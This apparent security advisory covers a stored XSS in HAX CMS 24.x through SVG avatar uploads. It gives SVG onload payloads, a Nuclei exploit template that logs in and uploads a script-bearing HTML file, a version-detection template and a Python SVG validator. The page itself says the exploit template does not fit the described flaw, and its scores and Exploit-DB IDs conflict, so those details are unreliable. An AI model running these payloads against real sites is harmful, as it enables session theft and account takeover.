[webapps] HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
CVE-2026-22704
HAX CMS 24.x stored XSS: an attacker injects a malicious script through the user avatar upload feature.
Medium · CVSS 6.1

📋 Basic vulnerability information
| CVE | CVE-2026-22704 |
|---|---|
| Vulnerability type | Stored Cross-Site Scripting (Stored XSS) |
| Affected versions | HAX CMS 24.x |
| Severity | Medium · CVSS 6.1 |
| Published | 2026-04-29 |
| Submitter | Mohammed Idrees Banyamer |
| Source | Exploit-DB original |
🔬 Root cause
The user avatar upload feature does not filter event handler attributes such as `onload` in SVG files, so malicious SVG content is stored and executed when an administrator views it.
🎯 Attack scenario
1. The attacker registers an ordinary user account and logs in.
2. In the profile settings, the attacker uploads a crafted SVG file as the avatar; the SVG contains `<svg onload=alert(1)>`.
3. When an administrator or another user views the user list or user details in the back end, the browser loads the SVG image and the XSS payload fires.
4. The attacker can use the XSS to steal session cookies, perform administrator actions, and so on.
💥 Impact
An attacker can execute arbitrary JavaScript in the victim's browser, leading to session hijacking, disclosure of sensitive information, or tricking an administrator into performing malicious actions (such as creating an administrator account).
⚔️ Nuclei exploit template
The following is an exploitation template in standard Nuclei v3 format intended for verifying the vulnerability. Note that it does not match the root cause described above: it logs in and uploads through Drupal-style endpoints (`/user/login` with `form_id=user_login_form`, `/files/upload`, `/sites/default/files/`) and uploads an HTML file rather than an SVG avatar, and its severity and CVSS score differ from the header of this advisory. Confirm the endpoints against the actual target before relying on its result.
```yaml
id: CVE-2026-22704-exploit

info:
  name: HAX CMS 24.x - Stored Cross-Site Scripting (XSS)
  author: your-name
  severity: high
  description: Exploits a stored XSS vulnerability in HAX CMS by uploading a malicious HTML file.
  reference:
    - https://www.exploit-db.com/exploits/52000
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2026-22704
    cwe-id: CWE-79
  tags: cve,cve2026,haX,cms,xss,drupal,exploit

variables:
  username: '{{user}}'
  password: '{{pass}}'
  filename: 'poc.html'
  js_payload: 'alert("Stored XSS PoC - CVE-2026-22704");'

http:
  # Step 1: log in and capture the session cookie from the response headers.
  - raw:
      - |
        POST {{BaseURL}}/user/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        name={{username}}&pass={{password}}&form_id=user_login_form&op=Log+in
    cookie-reuse: true
    matchers:
      - type: word
        words:
          - 'Log out'
        part: body
    extractors:
      - type: regex
        name: session_cookie
        part: header
        regex:
          - 'SESS\w+=\w+;'

  # Step 2: upload the PoC file as the authenticated user.
  - raw:
      - |
        POST {{BaseURL}}/files/upload HTTP/1.1
        Host: {{Hostname}}
        Cookie: {{session_cookie}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW

        ------WebKitFormBoundary7MA4YWxkTrZu0gW
        Content-Disposition: form-data; name="files[upload]"; filename="{{filename}}"
        Content-Type: text/html

        <!DOCTYPE html>
        <html>
        <head>
        <meta charset="UTF-8">
        <title>PoC</title>
        </head>
        <body>
        <h2>HAX CMS Stored XSS PoC</h2>
        <script>
        {{js_payload}}
        </script>
        </body>
        </html>
        ------WebKitFormBoundary7MA4YWxkTrZu0gW--
    cookie-reuse: true
    matchers:
      - type: status
        status:
          - 200
          - 201
          - 302
        condition: or
    extractors:
      - type: kval
        name: uploaded_file_url
        kval:
          - Location

  # Step 3: fetch the stored file and confirm the payload is served back unmodified.
  - raw:
      - |
        GET {{BaseURL}}/sites/default/files/{{filename}} HTTP/1.1
        Host: {{Hostname}}
    matchers:
      - type: word
        words:
          - '{{js_payload}}'
        part: body
    extractors:
      - type: regex
        name: extracted_payload
        part: body
        regex:
          - '<script>.*</script>'

skip-variables-check: true
```

🔍 Nuclei detection template
The following detection template checks whether a target reports an affected version. It only fingerprints the version string from `CHANGELOG.txt` or `composer.json`; it does not confirm that the avatar upload is actually exploitable.
```yaml
id: CVE-2026-22704-detection

info:
  name: HAX CMS 24.x - Detection
  author: your-name
  severity: medium
  description: Detects HAX CMS version to check if it is <= 24.x which is vulnerable to Stored XSS.
  reference:
    - https://www.exploit-db.com/exploits/52000
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2026-22704
    cwe-id: CWE-79
  tags: cve,cve2026,haX,cms,xss,drupal,detection

http:
  - method: GET
    path:
      - '{{BaseURL}}/CHANGELOG.txt'
      - '{{BaseURL}}/composer.json'
    matchers-condition: or
    matchers:
      - type: word
        words:
          - 'HAX CMS'
          - '24.'
        part: body
        condition: and
      - type: regex
        regex:
          - '"version":\s*"24\.\d+"'
        part: body
    extractors:
      - type: regex
        name: version
        part: body
        regex:
          - 'HAX CMS 24\.\d+'
          - '"version":\s*"(24\.\d+)"'
    stop-at-first-match: true

skip-variables-check: true
```

🛡️ Remediation
Upgrade to the latest HAX CMS version (if available). Temporary mitigation: filter or escape the content of uploaded SVG files on the server side, rejecting `<script>` elements and event attributes such as `onload` and `onerror`.
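As an added example (not HAX CMS code and not part of the original advisory), the following Python implements the server-side check that the root cause and the remediation above call for: a validator for uploaded SVG avatars that rejects event-handler attributes, script-bearing elements, active `href` values and DTD/entity declarations, together with the response headers to serve stored avatars under so that a file which slipped through still cannot run script in the site's origin. All sample SVGs, the function names and the avatar-specific `href` allowlist are constructed assumptions for this example.

```python
"""Validate uploaded SVG avatars before storing them (constructed example)."""
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"

# Elements that can execute script, embed non-image content, or rewrite
# attributes (such as href) at runtime. Avatars never need any of them.
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "set", "animate"}

# Avatar policy (assumption): an href may only point at a fragment inside the
# same file or at an inline raster image. Everything else is rejected.
ALLOWED_HREF = re.compile(r"^(#|data:image/(png|jpeg|gif|webp);)")


def _local(qname: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return qname.rsplit("}", 1)[-1]


def _normalised_url(value: str) -> str:
    """Drop whitespace/control characters browsers ignore inside a URL scheme, then lower-case."""
    return re.sub(r"[\s\x00-\x1f]", "", value).lower()


def validate_svg(data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason). Only well-formed SVG with no active content is accepted."""
    lowered = data.lower()
    # Refuse DTDs before parsing: they enable entity expansion attacks on the parser.
    if b"<!doctype" in lowered or b"<!entity" in lowered:
        return False, "DTD or entity declarations are not allowed"
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        # The advisory's bare '<svg onload=alert(1)>' is not well-formed XML and
        # fails here; a quoted variant parses fine, so the attribute check below matters.
        return False, f"not well-formed XML: {exc}"
    if root.tag != f"{{{SVG_NS}}}svg":
        return False, "root element is not <svg> in the SVG namespace"
    for el in root.iter():
        tag = _local(el.tag)
        if tag in FORBIDDEN_ELEMENTS:
            return False, f"forbidden element <{tag}>"
        for attr, value in el.attrib.items():
            name = _local(attr).lower()
            if name.startswith("on"):
                return False, f"event handler attribute '{name}' on <{tag}>"
            if name == "href" and not ALLOWED_HREF.match(_normalised_url(value)):
                return False, f"disallowed href on <{tag}>: {value[:40]!r}"
            if name == "style" and re.search(r"url\s*\(|expression\s*\(", value, re.I):
                return False, f"external or active resource in style attribute on <{tag}>"
    return True, "ok"


def upload_response_headers() -> dict[str, str]:
    """Headers for serving stored avatars: correct type, no sniffing, no script execution."""
    return {
        "Content-Type": "image/svg+xml",
        "X-Content-Type-Options": "nosniff",
        "Content-Security-Policy": "default-src 'none'; style-src 'unsafe-inline'; sandbox",
    }


# Constructed sample uploads: one benign avatar and several that must be rejected.
SAMPLES = {
    "benign": b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
              b'<circle cx="5" cy="5" r="4" fill="#0a0"/></svg>',
    "onload_wellformed": b'<svg xmlns="http://www.w3.org/2000/svg" onload="alert(1)"/>',
    "onload_bare": b'<svg onload=alert(1)>',
    "script": b'<svg xmlns="http://www.w3.org/2000/svg"><script>alert(1)</script></svg>',
    "js_href": b'<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">'
               b'<a xlink:href="java\tscript:alert(1)"><text y="10">hi</text></a></svg>',
    "entity": b'<!DOCTYPE svg [<!ENTITY x "y">]><svg xmlns="http://www.w3.org/2000/svg">&x;</svg>',
}


def check_samples() -> dict[str, bool]:
    """Run the validator over every constructed sample; True means accepted."""
    return {name: validate_svg(svg)[0] for name, svg in SAMPLES.items()}


if __name__ == "__main__":
    for name, svg in SAMPLES.items():
        ok, reason = validate_svg(svg)
        print(f"{name:18} {'ACCEPT' if ok else 'REJECT'}  {reason}")
```

Run the validator on the raw bytes before the file touches disk and reject on the first finding rather than trying to strip offending parts; rewriting an attacker-controlled document is where sanitizers usually go wrong. The headers cover the remaining case: an SVG referenced from an `<img>` tag cannot run script anyway, but a stored file opened directly in the browser is a full document, and the `sandbox` CSP directive plus `nosniff` keep it from executing in the site's origin.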
📎 References
- https://www.exploit-db.com/exploits/52007
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22704
- Exploit-DB original
⚠️ This article is based on public vulnerability databases and is provided for security research and defensive reference only. Generated: 2026-05-07 06:07 | Source: Exploit-DB